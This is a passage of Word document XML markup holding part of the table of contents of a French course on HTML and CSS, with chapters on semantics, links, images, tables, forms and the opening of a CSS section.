        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3.6 Structurer le corps du document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3.7 Les commentaires et l'indentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>51</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3.8 Valider et diagnostiquer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>52</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4. Texte, listes et sémantique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>57</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4.1 Le texte avant la forme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>57</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4.2 Titres et paragraphes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>57</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4.3 Mise en valeur : sens ou apparence ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>58</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4.4 Listes : trois structures distinctes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>59</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4.5 Citations, code et données techniques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>60</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4.6 Caractères spéciaux et entités</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>60</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4.7 Relire et justifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>61</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5. Liens et navigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>66</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5.1 L'anatomie d'un lien</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>66</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5.2 Chemins relatifs : la règle des dossiers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>67</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5.3 Concevoir une navigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>67</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5.4 Liens externes, téléchargements et contacts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>68</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5.5 Ancres, fragments et retour en haut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>69</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5.6 Liens et référencement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>70</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>6. Images, vidéos et audio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>74</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>6.1 Choisir un format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>74</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>6.2 La balise img et son texte alternatif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>75</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>6.3 Dimensions, réserve d'espace et décalage de mise en page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>76</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>6.4 Réponses adaptatives : srcset et picture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>77</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>6.5 Vidéo et audio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>77</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>6.6 Optimiser sans dégrader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>78</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>7. Tableaux de données</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>83</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>7.1 Un tableau, c'est des données croisées</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>83</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>7.2 Construire un tableau lisible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>84</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>7.3 Fusion de cellules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>85</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>7.4 Tableaux et petits écrans</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>86</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>7.5 Tableau, liste ou composant ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>87</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>8. Formulaires HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>92</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>8.1 Anatomie d'un formulaire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>92</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>8.2 Étiquettes : la règle non négociable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>92</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>8.3 Choisir le bon champ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>93</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>8.4 Validation native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>94</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>8.5 Erreurs, aide et états</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>95</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>8.6 Au-delà du HTML : ce que le serveur doit faire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>96</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie II — CSS : mise en forme et design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>9. Premiers pas en CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>9.1 Une grammaire simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
